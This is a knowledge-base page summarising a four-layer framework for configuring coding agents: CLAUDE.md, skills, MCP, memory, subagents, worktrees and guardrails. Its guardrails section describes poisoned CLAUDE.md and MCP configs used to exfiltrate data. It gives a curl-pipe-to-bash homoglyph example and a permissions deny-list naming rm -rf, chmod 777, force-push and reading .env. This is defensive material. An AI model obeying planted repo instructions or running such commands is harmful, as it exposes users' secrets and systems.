Agentic Engineering

A four-layer framework for configuring coding agents to produce reliable, production-quality results.

Last updated: 2026-04-12

Overview

“Agentic Engineering” is Karpathy’s term for the emerging practice of working effectively with autonomous coding agents — distinct from vibe coding (prompting casually) or traditional software engineering. The gap between mediocre and excellent agent results is mostly about configuration, not model choice.

Paul Hoekstra’s framework organizes this into four layers, each addressing a different failure mode:

Layer	What it solves	Key tools
Configuration	Agent ignoring conventions, defaulting to training data	CLAUDE.md, skills, workflow frameworks
Capability	Agent hallucinating, lacking live context	MCP servers, memory, live docs
Orchestration	Parallel work conflicts, slow sequential execution	Subagents, worktrees
Guardrails	Destructive actions, security, runaway autonomy	Hooks, permissions

Layer 1: Configuration

CLAUDE.md — less is more

CLAUDE.md is injected into every API call, not just the first. A 2,000-token file in a 40-call session costs 80,000 input tokens just for instructions. Context bloat degrades performance: GPT-5.4 drops from 97.3% to 36.6% benchmark score at full context. A study found AI-generated boilerplate in the system prompt produces worse results than no file at all.

Rules of thumb:

Only include specific, human-curated rules you want enforced at all times
Keep it short; treat it as a living document
Cut any rule not consistently improving outcomes
When the model makes the same mistake repeatedly, add a targeted rule

Skills — loaded on demand

Skills live in .claude/skills/ and load contextually, not always. They keep domain knowledge out of the always-on context window. YAML frontmatter (name, description, globs) controls when they trigger.

SkillsBench evidence: Claude Haiku with human-curated skills (27.7%) beat Claude Opus without skills (22.0%) across 86 tasks. Skills matter more than model size. AI-generated skills erased all gains — human curation is the differentiator.

Enforcing skill compliance

Skills enforce nothing by default — models rationalize past instructions. Two techniques from obra/superpowers:

HARD-GATE directives: XML-tagged checkpoints. Models give disproportionate weight to XML-like tags (Anthropic recommends this in their own prompt engineering docs):

<HARD-GATE>
Do NOT write any code or take any implementation action
until you have presented a design and the user has approved it.
This applies to EVERY project regardless of perceived simplicity.
</HARD-GATE>

Anti-rationalization tables: Pre-emptive lists of common model excuses paired with corrections. The model generates plausible reasons to skip steps because humans in training data do the same. The table short-circuits this pattern before it starts.

Workflow frameworks

Full methodologies built from chained skills:

Superpowers (obra/superpowers): TDD, debugging, verification, code review skills with hard gates
Get Shit Done: slash commands + hooks + meta-prompting
Compound Engineering: Plan → Work → Review → Compound; last phase accumulates patterns into a searchable knowledge base

Division of labour

CLAUDE.md     → always-relevant project rules (short, human-curated)
Skills        → reusable task-specific procedures (loaded on demand)
Live prompt   → what's unique about the current task

The AI Sycophancy Problem

Models default to telling you what you seem to want to hear, not what’s true. The Bullshit Benchmark measures how often models challenge incoherent prompts vs. accept them. Results are poor across the board. In code, this manifests as redundant checks, unnecessary validation, and defensive error handling nobody asked for — instead of questioning bad assumptions.

CLAUDE.md behavioral rules and HARD-GATE directives are partly a defense against this default.

Layer 2: Capability

MCP and deferred loading

Fully loaded MCPs are expensive: GitHub MCP alone is ~2,200 tokens. With deferred tool loading (the default as of 2026), the agent starts with just a list of tool names and descriptions — full schema only fetched when a tool is actually used. A stack of GitHub + Exa + Context7 + DeepWiki runs ~607 tokens before any tools are used, vs. ~5,500 tokens fully loaded. Still more than a skill (which might be a few dozen tokens), but manageable.

MCP’s value isn’t just calling tools — it’s standardisation, auth, permissions, and cleaner interfaces than raw APIs/CLIs that were never designed with agents in mind.

The three external tools worth having

Context7: pulls live library docs, eliminating hallucinated API calls to renamed/deprecated functions
DeepWiki: AI-generated docs for GitHub repos — “how does authentication work?” answered from the actual codebase
Exa: AI-optimized search returning structured results, extracted content, highlights — not raw pages

Visual output extensions

Skills and MCPs aren’t limited to application code. Figma’s MCP server lets the agent read design specs and write back to the Figma canvas. frontend-slides (Claude Code skill) generates complete self-contained HTML presentations. remotion-best-practices produces Remotion/React code that renders to MP4.

Persistent memory: three layers

Claude Code sessions are stateless; each starts fresh. Three tools address memory at different layers:

Layer	Tool	What it covers	Scales?
Active context	MEMORY.md	Conventions, current decisions	No — flat file, token pressure
Session history	episodic-memory	Past conversations, reasoning traces	Yes — SQLite + vectors
Broader knowledge	QMD (Tobi Lutke/Shopify)	Docs, specs, meeting notes	Yes — on-device search

MEMORY.md works well at first; fails at scale because it’s injected into every system prompt like CLAUDE.md. episodic-memory (github.com/obra/episodic-memory) indexes JSONL session files as vectors so the agent can semantically search past conversations — recovering not just what was decided but why. QMD (github.com/tobi/qmd) exposes an MCP server over your broader knowledge base. Start with grep; reach for vectors when grep stops being enough.

See agent-memory for the full three-layer breakdown.

Layer 3: Orchestration

Context quality is the bottleneck

The Ralph loop (github.com/snarktank/ralph) went viral by doing something trivially simple: re-running a single agent in a loop with fresh context each iteration, tracking progress in files and git. Agents could work for hours without degrading, because the context window never filled up with stale reasoning and dead ends.

Subagents work for the same reason. The obvious benefit is parallelism. The bigger benefit is compression: test output, long docs, side quests all stay in the subagent’s context. Only the final result returns to the parent.

Subagents vs agent teams

Subagents: fire-and-forget workers, each with a clean context window and one job. Defined as Markdown files with YAML frontmatter in .claude/agents/ (project-level) or ~/.claude/agents/ (user-level). Key fields: name, description (routing signal — when to reach for this agent), tools, model. Cannot spawn subagents or talk to each other; all results flow through the parent.

Agent teams (experimental, CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1): long-running persistent instances that communicate directly with each other and coordinate via a shared task list with dependencies. Heavier, higher cost. For most use cases, start with subagents.

Git worktrees for parallel isolation

Multiple agents on the same repo will collide without worktrees. A worktree is a separate checkout sharing the same .git directory but with its own working tree and branch:

my-project/.worktrees/
├── feature-auth/    # agent 1
└── fix-billing/     # agent 2

claude --worktree starts a session in an isolated checkout. isolation: "worktree" in a subagent definition does it automatically. Project configs and memory are shared across worktrees.

Orchestration tools

JetBrains Air: parallel agents in isolated Docker containers or worktrees, single review UI
Conductor (conductor.build): similar for Claude Code + Codex; parallel sessions + diff viewer
Vibekanban (github.com/BloopAI/vibe-kanban): lightweight kanban for agent tasks
Cline Kanban: project decomposition from a single prompt; dependency-aware parallelization
Paperclip (github.com/paperclipai/paperclip): org charts, task delegation, budget ceilings, governance with human “board” for high-impact decisions

Design around context, not roles

Splitting work by role (planner, implementer, tester) creates a telephone game where information degrades at every handoff. Split by context instead: an agent implementing a feature should also write its tests because it already has the context. The sweet spot is read-heavy delegation — exploration, analysis, summarisation. Keep write-heavy work sequential unless parallelism is truly necessary.

Layer 4: Guardrails

CLAUDE.md and MCP poisoning

A cloned repo can contain a CLAUDE.md with instructions that look like normal project config but exfiltrate data or execute arbitrary commands. Treat CLAUDE.md like a Makefile — as code, not documentation. Review before trusting. PR review required; no direct pushes to main.

Critical: Set enableAllProjectMcpServers: false. Otherwise a cloned repo can register its own MCP server — arbitrary code running with agent permissions. Combined with a poisoned CLAUDE.md, this is a clean supply-chain attack from a git clone.

Unicode homoglyph attacks

curl -sSL https://install.example-cli.dev | bash and curl -sSL https://іnstall.example-clі.dev | bash look identical. The Latin i is ASCII 105; the Cyrillic і is Unicode 1110. Browsers show punycode for defense; terminals don’t.

Tirith (github.com/sheeki03/tirith): a local validator behind a PreToolUse hook on Bash. Catches hostname homoglyphs, path homoglyphs, insecure transport, ANSI injection, pipe-to-shell patterns, and environment manipulation.

Sandboxing

Built-in sandbox (Linux: bubblewrap; macOS: Apple Sandbox):

Can read: project dir + system libraries
Can write: project dir + /tmp/claude-{uid}/
Blocked even for reading: ~/.ssh, ~/.aws, ~/.gnupg, ~/.docker
Network: whitelisted hosts only

For full isolation: Docker with --network none. For agent-generated code at scale: Cloudflare Dynamic Workers (per-execution, millisecond startup, credentials injected server-side).

Permissions

.claude/settings.json (project-level, committed to repo) defines what the agent can do without asking. .claude/settings.local.json (user-level, local) adds a deny-list:

{
  "permissions": {
    "allow": ["Bash(uv run pytest:*)", "Bash(git commit:*)", "Bash(gh pr create:*)"],
    "deny": ["Read(./.env)", "Bash(rm -rf)", "Bash(chmod 777)", "Bash(git push --force origin main)"]
  }
}

Auto mode: built-in classifier between full manual approval and --dangerously-skip-permissions. Safe operations proceed automatically; risky ones get blocked. Combined with the deny-list and sandboxing, this lets the agent move without constant hand-holding.

AST-grep

AI writes syntactically perfect code that smuggles in subtly wrong patterns — code that passes ruff, passes type checking, maybe even passes tests, but contains patterns you never wanted. AST-grep catches this by matching code structure, not strings.

Example — mutable default arguments (AI reproduces this from millions of training examples without understanding it’s dangerous):

id: no-mutable-default-list
language: python
severity: error
rule:
  kind: default_parameter
  any:
    - has: { kind: list }
    - has: { kind: dictionary }

Wire into pre-commit and CI. If your agent keeps producing the same anti-pattern, encode it as a structural rule and stop having the same conversation forever.

Pre-commit: the corrective loop

Four layers: standard hooks (trailing whitespace, valid YAML, 500KB limit) → Ruff → Bandit → AST-grep. The loop is corrective, not just defensive: agent writes code, hits pre-commit rejection, rewrites, commits clean. The enforcement teaches.

CI: the shared gate

Same checks enforced remotely in a fresh environment. Add a concurrency block to cancel stale runs when a new push arrives — agents are prolific branch creators and without this you burn Actions minutes on obsolete runs.

Connections

claude-code-skills — detailed breakdown of skill types, writing tips, distribution; HARD-GATE and anti-rationalization extend this
thin-harness-fat-skills — same architectural principle; Hoekstra adds the token cost argument for keeping the config layer lean
coding-agent — Raschka’s six-component harness maps onto Hoekstra’s four layers
model-context-protocol — Layer 2 (Capability) relies on MCP servers for live data access
agent-memory — three-layer memory model from Layer 2 in detail
paul-hoekstra — author

Sources

Agentic Engineering, part 1: The Configuration Layer — Paul Hoekstra — added 2026-04-12
Agentic Engineering, part 2: What the Agent Doesn’t Know — Paul Hoekstra — added 2026-04-12
Agentic Engineering, part 3: The Orchestration Layer — Paul Hoekstra — added 2026-04-12
Agentic Engineering, part 4: Keeping Agents on a Leash — Paul Hoekstra — added 2026-04-12

second-brain

Explorer

agentic-engineering